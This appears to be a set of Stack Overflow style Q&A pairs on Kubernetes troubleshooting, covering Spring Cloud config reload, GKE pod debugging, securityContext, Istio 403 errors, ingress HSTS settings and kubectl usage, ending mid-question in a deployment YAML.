2019-01-02 13:41:45.353 WARN 1 --- [ main] ConfigServletWebServerApplicationContext : Exception encountered during context initialization - cancelling refresh attempt: org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'propertyChangeWatcher' defined in class path resource [org/springframework/cloud/kubernetes/config/reload/ConfigReloadAutoConfiguration$ConfigReloadAutoConfigurationBeans.class]: Unsatisfied dependency expressed through method 'propertyChangeWatcher' parameter 1; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'configurationUpdateStrategy' defined in class path resource [org/springframework/cloud/kubernetes/config/reload/ConfigReloadAutoConfiguration$ConfigReloadAutoConfigurationBeans.class]: Unsatisfied dependency expressed through method 'configurationUpdateStrategy' parameter 2; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No qualifying bean of type 'org.springframework.cloud.context.restart.RestartEndpoint' available: expected at least 1 bean which qualifies as autowire candidate. Dependency annotations: {}
2019-01-02 13:41:45.358 INFO 1 --- [ main] o.s.s.concurrent.ThreadPoolTaskExecutor : Shutting down ExecutorService 'applicationTaskExecutor'
2019-01-02 13:41:45.370 INFO 1 --- [ main] o.apache.catalina.core.StandardService : Stopping service [Tomcat]
2019-01-02 13:41:45.398 INFO 1 --- [ main] ConditionEvaluationReportLoggingListener :
Error starting ApplicationContext. To display the conditions report re-run your application with 'debug' enabled.
2019-01-02 13:41:45.612 ERROR 1 --- [ main] o.s.b.d.LoggingFailureAnalysisReporter :
***************************
APPLICATION FAILED TO START
***************************
Description:
Parameter 2 of method configurationUpdateStrategy in org.springframework.cloud.kubernetes.config.reload.ConfigReloadAutoConfiguration$ConfigReloadAutoConfigurationBeans required a bean of type 'org.springframework.cloud.context.restart.RestartEndpoint' that could not be found.
The following candidates were found but could not be injected:
- Bean method 'restartEndpoint' in 'RestartEndpointWithIntegrationConfiguration' not loaded because @ConditionalOnClass did not find required class 'org.springframework.integration.monitor.IntegrationMBeanExporter'
- Bean method 'restartEndpointWithoutIntegration' in 'RestartEndpointWithoutIntegrationConfiguration' not loaded because @ConditionalOnEnabledEndpoint no property management.endpoint.restart.enabled found so using endpoint default
Action:
Consider revisiting the entries above or defining a bean of type 'org.springframework.cloud.context.restart.RestartEndpoint' in your configuration.
</code></pre>
<p>If I set <code>spring.cloud.kubernetes.reload.enabled</code> to <code>false</code> everything works and the configmap is read and put to use. Now my goal is to reload the configuration if the configmap changes but get the exception seen above. I can invoke <code>/actuator/refresh</code> manually so I don't think it is the lack of the availability for the refresh endpoint.</p>
<p>I created a demo project with all included at <a href="https://drive.google.com/open?id=1QbP8vePALLZ2hWQJArnyxrzSySuXHKiz" rel="noreferrer">https://drive.google.com/open?id=1QbP8vePALLZ2hWQJArnyxrzSySuXHKiz</a> .</p>
| <p>It starts if you set <code>management.endpoint.restart.enabled=true</code></p>
<p>The message tells you that it can't load a <code>RestartEndpoint</code> bean. None was created because there are two ways it could be loaded and neither was satisfied:</p>
<blockquote>
<ul>
<li>Bean method 'restartEndpoint' in 'RestartEndpointWithIntegrationConfiguration' not loaded because @ConditionalOnClass did not find required class 'org.springframework.integration.monitor.IntegrationMBeanExporter'</li>
</ul>
</blockquote>
<p>Well you're not using spring integration so I guess you don't want this path - you want the other one.</p>
<blockquote>
<ul>
<li>Bean method 'restartEndpointWithoutIntegration' in 'RestartEndpointWithoutIntegrationConfiguration' not loaded because @ConditionalOnEnabledEndpoint no property management.endpoint.restart.enabled found so using endpoint default</li>
</ul>
</blockquote>
<p>So <a href="https://stackoverflow.com/questions/49641443/springboot-upgrade-1-5-8-to-2-0-release-getting-exception-org-springframework-b">we need to set</a> <code>management.endpoint.restart.enabled=true</code>, which is also set in the <a href="https://github.com/spring-cloud/spring-cloud-kubernetes/blob/a30b2d85dc7ea04add4d54a24ad04e0e787a4e59/spring-cloud-kubernetes-examples/kubernetes-reload-example/src/main/resources/application.yaml#L4" rel="noreferrer">official reload example project</a>. Without setting this the RestartEndpoint bean that we require <a href="https://github.com/spring-cloud/spring-cloud-commons/blob/master/spring-cloud-context/src/main/java/org/springframework/cloud/autoconfigure/RefreshEndpointAutoConfiguration.java#L104" rel="noreferrer">will not be loaded</a>.</p>
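<p>In terms of the <code>bootstrap.properties</code> shown in the question, that means adding one more line alongside the existing <code>management.*</code> entries:</p>
<pre><code>management.endpoint.restart.enabled=true
</code></pre>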
|
<p>I am new to containers and using GKE. I used to run my node server app with <code>npm run debug</code> and am trying to do this as well on GKE using the shell of my container. When I log into the shell of <code>myapp</code> container and do this I get:</p>
<pre><code>> [email protected] start /usr/src/app
> node src/
events.js:167
throw er; // Unhandled 'error' event
^
Error: listen EADDRINUSE :::8089
</code></pre>
<p>Normally I deal with this using something like <a href="https://stackoverflow.com/questions/9898372/how-to-fix-error-listen-eaddrinuse-while-using-nodejs"><code>killall -9 node</code></a> but when I do this it looks like I am kicked out of my shell and the container is restarted by kubernetes. It seems node is using the port already or something:</p>
<pre><code>netstat -tulpn | grep 8089
tcp 0 0 :::8089 :::* LISTEN 23/node
</code></pre>
<p>How can I start my server from the shell?</p>
<p>My config files:
Dockerfile:</p>
<pre><code>FROM node:10-alpine
RUN apk add --update \
libc6-compat
WORKDIR /usr/src/app
COPY package*.json ./
COPY templates-mjml/ templates-mjml/
COPY public/ public/
COPY src/ src/
COPY data/ data/
COPY config/ config/
COPY migrations/ migrations/
ENV NODE_ENV 'development'
ENV PORT '8089'
RUN npm install --development
</code></pre>
<p>myapp.yaml:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: myapp
labels:
app: myapp
spec:
ports:
- port: 8089
name: http
selector:
app: myapp
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: myapp
labels:
app: myapp
spec:
selector:
matchLabels:
app: myapp
template:
metadata:
labels:
app: myapp
spec:
containers:
- name: myapp
image: gcr.io/myproject-224713/firstapp:v4
ports:
- containerPort: 8089
env:
- name: POSTGRES_DB_HOST
value: 127.0.0.1:5432
- name: POSTGRES_DB_USER
valueFrom:
secretKeyRef:
name: mysecret
key: username
- name: POSTGRES_DB_PASSWORD
valueFrom:
secretKeyRef:
name: mysecret
key: password
- name: cloudsql-proxy
image: gcr.io/cloudsql-docker/gce-proxy:1.11
command: ["/cloud_sql_proxy",
"-instances=myproject-224713:europe-west4:mydatabase=tcp:5432",
"-credential_file=/secrets/cloudsql/credentials.json"]
securityContext:
runAsUser: 2
allowPrivilegeEscalation: false
volumeMounts:
- name: cloudsql-instance-credentials
mountPath: /secrets/cloudsql
readOnly: true
volumes:
- name: cloudsql-instance-credentials
secret:
secretName: cloudsql-instance-credentials
---
</code></pre>
<p>myrouter.yaml:</p>
<pre><code>apiVersion: networking.istio.io/v1alpha3
kind: Gateway
metadata:
name: myapp-gateway
spec:
selector:
istio: ingressgateway
servers:
- port:
number: 80
name: http
protocol: HTTP
hosts:
- "*"
---
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
name: myapp
spec:
hosts:
- "*"
gateways:
- myapp-gateway
http:
- match:
- uri:
prefix: /
route:
- destination:
host: myapp
weight: 100
websocketUpgrade: true
</code></pre>
<p>EDIT:
I got the following logs: <a href="https://i.stack.imgur.com/QqjtF.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/QqjtF.png" alt="enter image description here"></a></p>
<p>EDIT 2:
After adding a <a href="https://think-engineer.com/blog/cloud-computing/exposing-a-feathers-js-http-api-in-kubernetes-using-ingress" rel="nofollow noreferrer">featherjs health service</a> I get the following output for <code>describe</code>:</p>
<pre><code>Name: myapp-95df4dcd6-lptnq
Namespace: default
Node: gke-standard-cluster-1-default-pool-59600833-pcj3/10.164.0.3
Start Time: Wed, 02 Jan 2019 22:08:33 +0100
Labels: app=myapp
pod-template-hash=518908782
Annotations: kubernetes.io/limit-ranger: LimitRanger plugin set: cpu request for container myapp; cpu request for container cloudsql-proxy
sidecar.istio.io/status:
{"version":"3c9617ff82c9962a58890e4fa987c69ca62487fda71c23f3a2aad1d7bb46c748","initContainers":["istio-init"],"containers":["istio-proxy"]...
Status: Running
IP: 10.44.3.17
Controlled By: ReplicaSet/myapp-95df4dcd6
Init Containers:
istio-init:
Container ID: docker://768b2327c6cfa57b3d25a7029e52ce6a88dec6848e91dd7edcdf9074c91ff270
Image: gcr.io/gke-release/istio/proxy_init:1.0.2-gke.0
Image ID: docker-pullable://gcr.io/gke-release/istio/proxy_init@sha256:e30d47d2f269347a973523d0c5d7540dbf7f87d24aca2737ebc09dbe5be53134
Port: <none>
Host Port: <none>
Args:
-p
15001
-u
1337
-m
REDIRECT
-i
*
-x
-b
8089,
-d
State: Terminated
Reason: Completed
Exit Code: 0
Started: Wed, 02 Jan 2019 22:08:34 +0100
Finished: Wed, 02 Jan 2019 22:08:35 +0100
Ready: True
Restart Count: 0
Environment: <none>
Mounts: <none>
Containers:
myapp:
Container ID: docker://5566a3e8242ec6755dc2f26872cfb024fab42d5f64aadc3db1258fcb834f8418
Image: gcr.io/myproject-224713/firstapp:v4
Image ID: docker-pullable://gcr.io/myproject-224713/firstapp@sha256:0cbd4fae0b32fa0da5a8e6eb56cb9b86767568d243d4e01b22d332d568717f41
Port: 8089/TCP
Host Port: 0/TCP
State: Running
Started: Wed, 02 Jan 2019 22:09:19 +0100
Last State: Terminated
Reason: Completed
Exit Code: 0
Started: Wed, 02 Jan 2019 22:08:35 +0100
Finished: Wed, 02 Jan 2019 22:09:19 +0100
Ready: False
Restart Count: 1
Requests:
cpu: 100m
Liveness: http-get http://:8089/health delay=15s timeout=20s period=10s #success=1 #failure=3
Readiness: http-get http://:8089/health delay=5s timeout=5s period=10s #success=1 #failure=3
Environment:
POSTGRES_DB_HOST: 127.0.0.1:5432
POSTGRES_DB_USER: <set to the key 'username' in secret 'mysecret'> Optional: false
POSTGRES_DB_PASSWORD: <set to the key 'password' in secret 'mysecret'> Optional: false
Mounts:
/var/run/secrets/kubernetes.io/serviceaccount from default-token-9vtz5 (ro)
cloudsql-proxy:
Container ID: docker://414799a0699abe38c9759f82a77e1a3e06123714576d6d57390eeb07611f9a63
Image: gcr.io/cloudsql-docker/gce-proxy:1.11
Image ID: docker-pullable://gcr.io/cloudsql-docker/gce-proxy@sha256:5c690349ad8041e8b21eaa63cb078cf13188568e0bfac3b5a914da3483079e2b
Port: <none>
Host Port: <none>
Command:
/cloud_sql_proxy
-instances=myproject-224713:europe-west4:osm=tcp:5432
-credential_file=/secrets/cloudsql/credentials.json
State: Running
Started: Wed, 02 Jan 2019 22:08:36 +0100
Ready: True
Restart Count: 0
Requests:
cpu: 100m
Environment: <none>
Mounts:
/secrets/cloudsql from cloudsql-instance-credentials (ro)
/var/run/secrets/kubernetes.io/serviceaccount from default-token-9vtz5 (ro)
istio-proxy:
Container ID: docker://898bc95c6f8bde18814ef01ce499820d545d7ea2d8bf494b0308f06ab419041e
Image: gcr.io/gke-release/istio/proxyv2:1.0.2-gke.0
Image ID: docker-pullable://gcr.io/gke-release/istio/proxyv2@sha256:826ef4469e4f1d4cabd0dc846f9b7de6507b54f5f0d0171430fcd3fb6f5132dc
Port: <none>
Host Port: <none>
Args:
proxy
sidecar
--configPath
/etc/istio/proxy
--binaryPath
/usr/local/bin/envoy
--serviceCluster
myapp
--drainDuration
45s
--parentShutdownDuration
1m0s
--discoveryAddress
istio-pilot.istio-system:15007
--discoveryRefreshDelay
1s
--zipkinAddress
zipkin.istio-system:9411
--connectTimeout
10s
--statsdUdpAddress
istio-statsd-prom-bridge.istio-system:9125
--proxyAdminPort
15000
--controlPlaneAuthPolicy
NONE
State: Running
Started: Wed, 02 Jan 2019 22:08:36 +0100
Ready: True
Restart Count: 0
Requests:
cpu: 10m
Environment:
POD_NAME: myapp-95df4dcd6-lptnq (v1:metadata.name)
POD_NAMESPACE: default (v1:metadata.namespace)
INSTANCE_IP: (v1:status.podIP)
ISTIO_META_POD_NAME: myapp-95df4dcd6-lptnq (v1:metadata.name)
ISTIO_META_INTERCEPTION_MODE: REDIRECT
Mounts:
/etc/certs/ from istio-certs (ro)
/etc/istio/proxy from istio-envoy (rw)
Conditions:
Type Status
Initialized True
Ready False
PodScheduled True
Volumes:
cloudsql-instance-credentials:
Type: Secret (a volume populated by a Secret)
SecretName: cloudsql-instance-credentials
Optional: false
default-token-9vtz5:
Type: Secret (a volume populated by a Secret)
SecretName: default-token-9vtz5
Optional: false
istio-envoy:
Type: EmptyDir (a temporary directory that shares a pod's lifetime)
Medium: Memory
istio-certs:
Type: Secret (a volume populated by a Secret)
SecretName: istio.default
Optional: true
QoS Class: Burstable
Node-Selectors: <none>
Tolerations: node.kubernetes.io/not-ready:NoExecute for 300s
node.kubernetes.io/unreachable:NoExecute for 300s
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Normal Scheduled 68s default-scheduler Successfully assigned myapp-95df4dcd6-lptnq to gke-standard-cluster-1-default-pool-59600833-pcj3
Normal SuccessfulMountVolume 68s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 MountVolume.SetUp succeeded for volume "istio-envoy"
Normal SuccessfulMountVolume 68s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 MountVolume.SetUp succeeded for volume "default-token-9vtz5"
Normal SuccessfulMountVolume 68s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 MountVolume.SetUp succeeded for volume "cloudsql-instance-credentials"
Normal SuccessfulMountVolume 68s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 MountVolume.SetUp succeeded for volume "istio-certs"
Normal Pulled 67s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Container image "gcr.io/gke-release/istio/proxy_init:1.0.2-gke.0" already present on machine
Normal Created 67s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Created container
Normal Started 67s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Started container
Normal Pulled 66s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Container image "gcr.io/cloudsql-docker/gce-proxy:1.11" already present on machine
Normal Created 66s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Created container
Normal Started 66s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Started container
Normal Created 65s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Created container
Normal Started 65s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Started container
Normal Pulled 65s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Container image "gcr.io/gke-release/istio/proxyv2:1.0.2-gke.0" already present on machine
Normal Created 65s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Created container
Normal Started 65s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Started container
Warning Unhealthy 31s (x4 over 61s) kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Readiness probe failed: HTTP probe failed with statuscode: 404
Normal Pulled 22s (x2 over 66s) kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Container image "gcr.io/myproject-224713/firstapp:v4" already present on machine
Warning Unhealthy 22s (x3 over 42s) kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Liveness probe failed: HTTP probe failed with statuscode: 404
Normal Killing 22s kubelet, gke-standard-cluster-1-default-pool-59600833-pcj3 Killing container with id docker://myapp:Container failed liveness probe.. Container will be killed and recreated.
</code></pre>
| <p>This is just how Kubernetes works: as long as your pod has processes running, it will remain 'up'. The moment you kill one of its processes, Kubernetes restarts the pod because it assumes something crashed or went wrong.</p>
<p>If you really want to debug with <code>npm run debug</code> consider either:</p>
<ol>
<li><p>Build a container image whose Dockerfile ends with a <a href="https://docs.docker.com/engine/reference/builder/#cmd" rel="nofollow noreferrer"><code>CMD</code></a> or <a href="https://docs.docker.com/engine/reference/builder/#entrypoint" rel="nofollow noreferrer"><code>ENTRYPOINT</code></a> of <code>npm run debug</code>, then run it using a Deployment definition in Kubernetes.</p></li>
<li><p>Override the command in the <code>myapp</code> container in your deployment definition with something like:</p>
<pre><code>spec:
containers:
- name: myapp
image: gcr.io/myproject-224713/firstapp:v4
ports:
- containerPort: 8089
command: ["npm", "run", "debug" ]
env:
- name: POSTGRES_DB_HOST
value: 127.0.0.1:5432
- name: POSTGRES_DB_USER
valueFrom:
secretKeyRef:
name: mysecret
key: username
- name: POSTGRES_DB_PASSWORD
valueFrom:
secretKeyRef:
name: mysecret
key: password
</code></pre></li>
</ol>
|
<p>I have multiple containers and want to run all of them as a non-root user. I know adding a securityContext will help, but do I need to add a securityContext to every container, or will adding it at the pod spec level be enough?</p>
<pre><code>spec:
template:
    metadata:
      labels:
        app: test-app
spec:
securityContext:
runAsUser: 1000
fsGroup: 1000
containers:
      - name: container-1
        securityContext:
          allowPrivilegeEscalation: false
      - name: container-2
        securityContext:
          allowPrivilegeEscalation: false
</code></pre>
<p>The question is: does <code>runAsUser</code> apply to all the containers, i.e. will all the containers (container-1, container-2) run as user 1000, or do I need to specify a securityContext in every container?</p>
| <blockquote>
<p>The question is, runAsUser is applicable to all the container i.e., all the containers (container-1, container-2) will run as user 1000 or I need to specify securityContext in all the container?</p>
</blockquote>
<p>Yes. It's applicable to all the containers, so you only need to add it to the pod spec if you want to have it in all the containers of that particular pod. As per the <a href="https://kubernetes.io/docs/tasks/configure-pod-container/security-context/#set-the-security-context-for-a-pod" rel="noreferrer">docs</a>:</p>
<blockquote>
<p>The security settings that you specify for a Pod apply to all Containers in the Pod. </p>
</blockquote>
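<p>For illustration, here is a minimal sketch (container names, images and commands are placeholders) showing that the pod-level <code>runAsUser</code> applies to both containers, while a container-level <code>securityContext</code> can still override it for a single container:</p>
<pre><code>apiVersion: v1
kind: Pod
metadata:
  name: security-context-demo
spec:
  securityContext:
    runAsUser: 1000   # applies to every container in this pod
    fsGroup: 1000
  containers:
  - name: container-1
    image: busybox
    command: ["sh", "-c", "id && sleep 3600"]
    securityContext:
      allowPrivilegeEscalation: false   # still runs as UID 1000 (inherited from the pod)
  - name: container-2
    image: busybox
    command: ["sh", "-c", "id && sleep 3600"]
    securityContext:
      runAsUser: 2000                   # overrides the pod-level value for this container only
      allowPrivilegeEscalation: false
</code></pre>
<p>Running <code>kubectl exec security-context-demo -c container-1 -- id</code> should report UID 1000, while <code>container-2</code> reports UID 2000.</p>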
|
<p>I'm using a Kubernetes/Istio setup and my list of pods and services are as below:</p>
<pre><code>NAME READY STATUS RESTARTS AGE
hr--debug-deployment-86575cffb6-wl6rx 2/2 Running 0 33m
hr--hr-deployment-596946948d-jrd7g 2/2 Running 0 33m
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
hr--debug-service ClusterIP 10.104.160.61 <none> 80/TCP 33m
hr--hr-service ClusterIP 10.102.117.177 <none> 80/TCP 33m
</code></pre>
<p>I'm attempting to curl into <code>hr--hr-service</code> from <code>hr--debug-deployment-86575cffb6-wl6rx</code></p>
<pre><code>pasan@ubuntu:~/product-vick$ kubectl exec -it hr--debug-deployment-86575cffb6-wl6rx /bin/bash
Defaulting container name to debug.
Use 'kubectl describe pod/hr--debug-deployment-86575cffb6-wl6rx -n default' to see all of the containers in this pod.
root@hr--debug-deployment-86575cffb6-wl6rx:/# curl hr--hr-service -v
* Rebuilt URL to: hr--hr-service/
* Trying 10.102.117.177...
* Connected to hr--hr-service (10.102.117.177) port 80 (#0)
> GET / HTTP/1.1
> Host: hr--hr-service
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 403 Forbidden
< date: Thu, 03 Jan 2019 04:06:17 GMT
< server: envoy
< content-length: 0
<
* Connection #0 to host hr--hr-service left intact
</code></pre>
<p>Can you please explain why I'm getting a 403 forbidden by envoy and how I can troubleshoot it?</p>
| <p>If you have the Envoy sidecar injected, this really depends on what type of <a href="https://istio.io/docs/concepts/security/#authentication-policies" rel="nofollow noreferrer">authentication policy</a> you have between your services. Are you using a <code>MeshPolicy</code> or a <code>Policy</code>?</p>
<p>You can also try disabling authentication between your services to debug. Something like this (if your policy is defined like this):</p>
<pre><code>apiVersion: "authentication.istio.io/v1alpha1"
kind: "Policy"
metadata:
name: "hr--hr-service"
spec:
targets:
- name: hr--hr-service
peers:
- mTLS:
mode: PERMISSIVE
</code></pre>
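<p>If you go this route, apply the policy and retry the call from the debug container (a usage sketch; the file name is hypothetical):</p>
<pre><code>kubectl apply -f hr-hr-service-policy.yaml
kubectl exec -it hr--debug-deployment-86575cffb6-wl6rx -c debug -- curl -v http://hr--hr-service
</code></pre>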
|
<p>I have used external DNS with my load balancer. Now I have to print the output on my Gitlab console.</p>
<p>This is the service:</p>
<pre><code>test-dev-service-lb-http LoadBalancer 192.20.18.123 XXXXXXXXXXXXXXX-623196XX.us-east-1.elb.amazonaws.com 443:32479/TCP
</code></pre>
<p>Now I can get the ELB endpoint on the console by running a command: <code>kubectl get svc -o wide</code>. But I want to print the DNS attached to this ELB in Route 53 as well. </p>
<p>How to do that?</p>
| <p>Kubernetes doesn't have knowledge of the DNS records pointing to your LB.
You should use the <a href="https://docs.aws.amazon.com/cli/latest/reference/route53/list-resource-record-sets.html" rel="nofollow noreferrer">AWS CLI</a> to query Route 53 for them.</p>
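<p>For example, something along these lines should work from your GitLab job (a sketch; the hosted zone ID is a placeholder you need to fill in):</p>
<pre><code># Grab the ELB hostname straight from the Service
ELB_HOST=$(kubectl get svc test-dev-service-lb-http \
  -o jsonpath='{.status.loadBalancer.ingress[0].hostname}')

# List the records in your hosted zone and keep the ones pointing at that ELB
aws route53 list-resource-record-sets --hosted-zone-id ZXXXXXXXXXXXXX \
  --output text | grep -i "$ELB_HOST"
</code></pre>
<p>Echoing the matching record name then prints the Route 53 DNS name on the GitLab console.</p>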
|
<p>I am a Kubernetes newbie, and I have a basic question.</p>
<p>My understanding from <a href="https://kubernetes.io/docs/reference/kubectl/conventions/" rel="nofollow noreferrer">https://kubernetes.io/docs/reference/kubectl/conventions/</a> is that we can generate YAML templates using the "kubectl run" command.</p>
<p>But when I tried doing the same, it didn't work:
<a href="https://i.stack.imgur.com/xcsWO.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/xcsWO.png" alt="attachment"></a></p>
<p>Not sure if my understanding is wrong or if something is wrong in my command.</p>
| <p>You're just missing a few flags.</p>
<p>The command should be </p>
<pre><code>kubectl run <podname> --image <imagename:tag> --dry-run -o yaml --generator=run-pod/v1
</code></pre>
<p>for example:</p>
<pre><code>kubectl run helloworld --image=helloworld --dry-run -o yaml --generator=run-pod/v1
</code></pre>
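<p>If you want to keep the generated manifest and create the Pod from it, you can redirect the output to a file (a usage sketch):</p>
<pre><code>kubectl run helloworld --image=helloworld --dry-run -o yaml --generator=run-pod/v1 > helloworld-pod.yaml
kubectl apply -f helloworld-pod.yaml
</code></pre>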
|
<p>We are moving towards microservices and using K8s for cluster orchestration. We are building infra using Dynatrace and a Prometheus server for metrics collection, but they are NOT yet in good shape.
Our Java application on one of the Pods is not working, and I want to see the application logs.</p>
<p>How do I access these logs? </p>
| <p>Assuming the application logs to stdout/err, <code>kubectl logs -n namespacename podname</code>.</p>
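<p>A few common variations, in case they help (pod, namespace and container names below are placeholders):</p>
<pre><code># follow the log stream
kubectl logs -f -n mynamespace mypod

# pick a specific container when the pod runs more than one (e.g. a sidecar)
kubectl logs -n mynamespace mypod -c myapp-container

# logs of the previous instance, useful after a crash/restart
kubectl logs -n mynamespace mypod --previous
</code></pre>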
|
<p>I'm new to gke/gcp and this is my first project.
I'm setting up istio using <a href="https://istio.io/docs/setup/kubernetes/quick-start-gke-dm/" rel="nofollow noreferrer">https://istio.io/docs/setup/kubernetes/quick-start-gke-dm/</a> tutorial.</p>
<p>I've exposed grafana as shown in the post using:<br>
<code>kubectl -n istio-system port-forward $(kubectl -n istio-system get pod -l app=grafana -o jsonpath='{.items[0].metadata.name}') 3000:3000 &
</code></p>
<p>curl <a href="http://localhost:3000/dashboard/db/istio-dashboard" rel="nofollow noreferrer">http://localhost:3000/dashboard/db/istio-dashboard</a>
gives me the HTML page on the terminal. To access it from the browser I'm using the master IP I get after executing <code>kubectl cluster-info</code>.</p>
<p>http://{master-ip}:3000/dashboard/db/istio-dashboard is not accessible. </p>
<p>How do I access services using port-forward on gke?</p>
| <p>First grab the name of the Pod</p>
<pre><code>$ kubectl get pod
</code></pre>
<p>and then use the port-forward command. </p>
<pre><code>$ kubectl port-forward <pod-name> 3000:3000
</code></pre>
<p>It worked for me. I found it on this <a href="https://medium.com/google-cloud/kubernetes-120-networking-basics-3b903f13093a" rel="nofollow noreferrer">nice</a> website, which also explains in detail how to do it. Hope it can be useful.</p>
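<p>One detail worth stressing for this case: <code>kubectl port-forward</code> binds to <code>127.0.0.1</code> on the machine where <code>kubectl</code> runs, so the dashboard will not be reachable via the cluster master IP. Assuming Grafana lives in the <code>istio-system</code> namespace (as in the Istio quick start):</p>
<pre><code>kubectl -n istio-system port-forward $(kubectl -n istio-system get pod -l app=grafana \
  -o jsonpath='{.items[0].metadata.name}') 3000:3000

# then open http://localhost:3000/dashboard/db/istio-dashboard
# in a browser on the same machine that is running kubectl
</code></pre>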
|
<p>I am experiencing this issue: my application needs to accept SSL connections only for WebSocket traffic, while plain HTTP requests must not be redirected to HTTPS. My ingress configuration is:</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: in-camonline
namespace: cl5
annotations:
kubernetes.io/ingress.class: "nginx"
nginx.org/websocket-services: "svc-ws-api"
nginx.ingress.kubernetes.io/ssl-redirect: "false"
nginx.ingress.kubernetes.io/force-ssl-redirect: "false"
ingress.kubernetes.io/affinity: "ClientIP"
spec:
tls:
- hosts:
- foo.bar.com
secretName: cl5-secret
rules:
- host: foo.bar.com
http:
paths:
- path: /socket.io
backend:
serviceName: svc-ws-api
servicePort: 8000
- path: /
backend:
serviceName: svc-http-service
servicePort: 80
</code></pre>
<p>I also disabled the <code>ssl-redirect</code> globally adding an item into the ConfigMap</p>
<pre><code>kind: ConfigMap
apiVersion: v1
metadata:
name: nginx-configuration
namespace: ingress
labels:
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/part-of: ingress-nginx
data:
#use-proxy-protocol: "false"
ssl-redirect: "false"
</code></pre>
<p>Now if I make a request using curl, it is not redirected. But if I run my front-end application, every request after the WSS one is forced to redirect to HTTPS:</p>
<pre><code>Request URL: http://foo.bar.com/2/symbols
Request Method: OPTIONS
Status Code: 307 Internal Redirect
Referrer Policy: no-referrer-when-downgrade
</code></pre>
<p>Any suggestion about how to achieve that? </p>
| <p>Finally, I sorted it out. If someone else is reading this: relax, you are not alone!</p>
<p>Jokes aside, the <code>nginx-controller</code> was setting the <code>Strict-Transport-Security</code> header after the first HTTPS call (the socket.io polling in my case). This header forces the browser to use TLS for all subsequent requests. You can read more about this header here <a href="https://developer.mozilla.org/it/docs/Web/HTTP/Headers/Strict-Transport-Security" rel="nofollow noreferrer">https://developer.mozilla.org/it/docs/Web/HTTP/Headers/Strict-Transport-Security</a></p>
<p>What I did was disable this behaviour by adding the entry <code>hsts: false</code> to the <code>ingress-controller</code>'s ConfigMap object (see the sketch below).
You can find more here <a href="https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/#hsts" rel="nofollow noreferrer">https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/#hsts</a>
Hope this can help you :)</p>
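<p>For reference, the ConfigMap ends up looking roughly like this (a sketch based on my setup; adjust the name and namespace to match your ingress controller installation):</p>
<pre><code>kind: ConfigMap
apiVersion: v1
metadata:
  name: nginx-configuration
  namespace: ingress
data:
  ssl-redirect: "false"
  hsts: "false"
</code></pre>
<p>Note that browsers cache the HSTS policy, so after changing this you may also need to clear the cached HSTS entry for your domain before plain HTTP requests stop being upgraded.</p>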
|
<p>I want rolling deployments for my pods. I'm updating my pods using <code>set image</code> in a CI environment. When I set maxUnavailable on the Deployment/web file to 1, I get downtime, but when I set maxUnavailable to 0, the pods do not get replaced and the container/app is not restarted.</p>
<p>Also, I have a single node in the Kubernetes cluster, and here's its info:</p>
<pre><code> Allocated resources:
(Total limits may be over 100 percent, i.e., overcommitted.)
CPU Requests CPU Limits Memory Requests Memory Limits
------------ ---------- --------------- -------------
881m (93%) 396m (42%) 909712Ki (33%) 1524112Ki (56%)
Events: <none>
</code></pre>
<p>Here's the complete YAML file. I do have a readiness probe set.</p>
<pre><code> apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "10"
kompose.cmd: C:\ProgramData\chocolatey\lib\kubernetes-kompose\tools\kompose.exe
convert
kompose.version: 1.14.0 (fa706f2)
kubectl.kubernetes.io/last-applied-configuration: |
{"apiVersion":"extensions/v1beta1","kind":"Deployment","metadata":{"annotations":{"kompose.cmd":"C:\\ProgramData\\chocolatey\\lib\\kubernetes-kompose\\tools\\kompose.exe convert","kompose.version":"1.14.0 (fa706f2)"},"creationTimestamp":null,"labels":{"io.kompose.service":"dev-web"},"name":"dev-web","namespace":"default"},"spec":{"replicas":1,"strategy":{},"template":{"metadata":{"labels":{"io.kompose.service":"dev-web"}},"spec":{"containers":[{"env":[{"name":"JWT_KEY","value":"ABCD"},{"name":"PORT","value":"2000"},{"name":"GOOGLE_APPLICATION_CREDENTIALS","value":"serviceaccount/quick-pay.json"},{"name":"mongoCon","value":"mongodb://quickpayadmin:[email 